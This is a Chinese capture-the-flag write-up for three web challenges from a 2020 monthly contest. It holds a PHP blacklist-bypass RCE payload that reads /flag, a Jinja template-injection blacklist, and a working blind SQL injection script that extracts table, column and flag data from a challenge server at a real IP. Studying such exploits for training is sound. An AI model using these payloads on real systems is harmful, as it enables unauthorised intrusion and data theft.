2020安恒8月月赛复现

月赛复现

0x01 ezrce

题目给了源码，

<?php
error_reporting(0);
show_source(__FILE__);
$code=$_POST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','@','\~','\^','\[','\]','\&','\?','\<','\>','\*','1','2','3','4','5','6','7','8','9','0');
//This blacklist is so stupid.
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('you are not smart');
    }
}
eval("echo($code)");
?>

可以看到题目过滤了大小写字母，数字和~、^、&等特殊符号，但是没有过滤|,利用|来构造，

<?php
function convert($de){
    $de = str_split($de);
    $str = "";
    foreach($de as $chr){
        echo $chr;
        $i = 1;
        while($i<255){
        //echo urldecode("%".$i)|urldecode("%60");
            if((chr($i)|urldecode("%60"))==$chr){
                echo chr($i);
                $str .= chr($i);
                break;
            }
            $i++;
        }
        
        
    }
    echo base64_encode($str);
    echo "\n";
}
$de = "readfile";
$de1 = "/flag";
convert($de);
convert($de1);
//EgUBBAYJDAU=
//BgwBBw==

将base解码后，发送

code=('````````'|'
	')('/````'|'/
'));//
base64 Y29kZT0oJ2BgYGBgYGBgJ3wnEgUBBAYJDAUnKSgnL2BgYGAnfCcvBgwBBycpKTsvLw==

0x02

题目给了源码

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, render_template, render_template_string, redirect, request, session, abort, send_from_directory
app = Flask(__name__)


@app.route("/")
def index():
    def safe_jinja(s):
        blacklist = ['class', 'attr', 'mro', 'base',
                     'request', 'session', '+', 'add', 'chr', 'ord', 'redirect', 'url_for', 'config', 'builtins', 'get_flashed_messages', 'get', 'subclasses', 'form', 'cookies', 'headers', '[', ']', '\'', '"', '{}']
        flag = True
        for no in blacklist:
            if no.lower() in s.lower():
                flag = False
                break
        return flag
    if not request.args.get('name'):
        return open(__file__).read()
    elif safe_jinja(request.args.get('name')):
        name = request.args.get('name')
    else:
        name = 'wendell'
    template = '''

    <div class="center-content">
        <p>Hello, %s</p>
    </div>
    <!--flag in /flag-->
    <!--python3.8-->
''' % (name)
    return render_template_string(template)


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

过滤了引号，常规的用reques也过滤了，

0x03 安恒大学

注册的验证邮件

http://183.129.189.60:10048/doAction.php?act=active&username=Mount4in&token=79e38f9896fbfd813240570a5a0de8de

逻辑条件不同，回显不同，

用脚本盲注

# encoding=utf-8
import requests
import time

url="http://183.129.189.60:10048/doAction.php?"
proxies = {
  		"http": "http://127.0.0.1:8080",
		}
flag=""

#erfenfa
for i in range(1,200):
	high = 127
	low = 32
	mid = (low + high) // 2
	while high > low:
		payload = "act=active&username=Mount4in' and ascii(mid((select group_concat(table_NAME) from information_schema.tableS where table_schema=database()),{},1))>{}--+-&token=79e38f9896fbfd813240570a5a0de8de"
		payload = "act=active&username=Mount4in' and ascii(mid((select group_concat(column_NAME) from information_schema.columnS where table_schema=database() and table_name='teachers'),{},1))>{}--+-&token=79e38f9896fbfd813240570a5a0de8de"
		payload = "act=active&username=Mount4in' and ascii(mid((select group_concat(f1aaaag) from teachers limit 1),{},1))>{}--+-&token=79e38f9896fbfd813240570a5a0de8de"
		payload = "act=active&username=Mount4in' and ascii(mid((select f1aaaag from teachers  limit 11,1),{},1))>{}--+-&token=79e38f9896fbfd813240570a5a0de8de"
		url_1=url+payload.format(i,mid)
		print payload.format(i,mid)
		r=requests.get(url_1,proxies=proxies)
		#print(r.content)
		if int(r.headers['content-length']) < 100:
			low=mid+1 
		else:
			high=mid
		mid=(low+high)//2
	flag+=chr(mid)
	print(flag) 
# table student,teachers,users
# teachers: id,f1aaaag

参考

https://www.gem-love.com/

https://rce.moe/****